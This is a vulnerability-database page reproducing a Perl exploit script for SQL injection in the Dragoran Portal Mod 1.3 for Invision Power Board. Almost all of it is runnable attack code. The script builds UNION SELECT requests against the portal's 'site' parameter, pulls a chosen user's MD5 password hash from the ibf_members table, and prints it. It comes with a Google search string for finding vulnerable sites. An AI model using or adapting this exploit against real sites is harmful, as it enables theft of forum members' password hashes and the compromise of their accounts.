Invision Power Board Dragoran Portal Mod <= 1.3 - SQL Injection Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Invision Power Board Dragoran Portal Mod SQL Injection Exploi

                                                #!/usr/bin/perl
###########################################
#IPB Portal 1.3-&#62;Invision Power Board plugin
#Created By SkOd
#SED security Team , http://sed-team.be
###########################################
#google:
#&#34;Portal 1.3 by Dragoran&#34;
###########################################



use IO::Socket;
if (@ARGV &#60; 3){
print q{
############################################################
#      IPB Portal 1.3 SQL injection Get Hash Exploit       #
#          Tested on Invision Power Board 1.3.0		   #
#	    created By SkOd. SED Security Team             #
############################################################
	ipbpro.pl [HOST] [PATH] [Target id]
	  ipbpro.pl www.host.com /forum/ 2 
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];


$serv =~ s/(http:\/\/)//eg;
$path = $dir.&#39;index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id=&#39;.$id.&#39;/*&#39;;
$path2 = $dir.&#39;index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id=&#39;.$id.&#39;/*&#39;;
$socket = IO::Socket::INET-&#62;new( Proto =&#62; &#34;tcp&#34;, PeerAddr =&#62; &#34;$serv&#34;, PeerPort =&#62; &#34;80&#34;) || die &#34;[-]Connect Failed\r\n&#34;;

print &#34;[+]Connecting...\n&#34;;
print $socket &#34;GET $path HTTP/1.1\n&#34;;
print $socket &#34;Host: $serv\n&#34;;
print $socket &#34;Accept: */*\n&#34;;
print $socket &#34;Connection: close\n\n&#34;;
print &#34;[+]Connected\n&#34;;
print &#34;[+]User ID: $id\n&#34;;
print &#34;[+]MD5 Hash: &#34;;
while ($answer = &#60;$socket&#62;)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign=&#34;top&#34; width=&#34;(.*?)&#34;/ && print &#34;$1&#34;;
}

$socket = IO::Socket::INET-&#62;new( Proto =&#62; &#34;tcp&#34;, PeerAddr =&#62; &#34;$serv&#34;, PeerPort =&#62; &#34;80&#34;) || die &#34;[-]Exploit Failed\r\n&#34;;
print $socket &#34;GET $path2 HTTP/1.1\n&#34;;
print $socket &#34;Host: $serv\n&#34;;
print $socket &#34;Accept: */*\n&#34;;
print $socket &#34;Connection: close\n\n&#34;;

while ($answer = &#60;$socket&#62;)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign=&#34;top&#34; width=&#34;(.*?)&#34;/ && print &#34;$1&#34;;
}

# milw0rm.com [2006-01-31]
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
perl socket sql-injection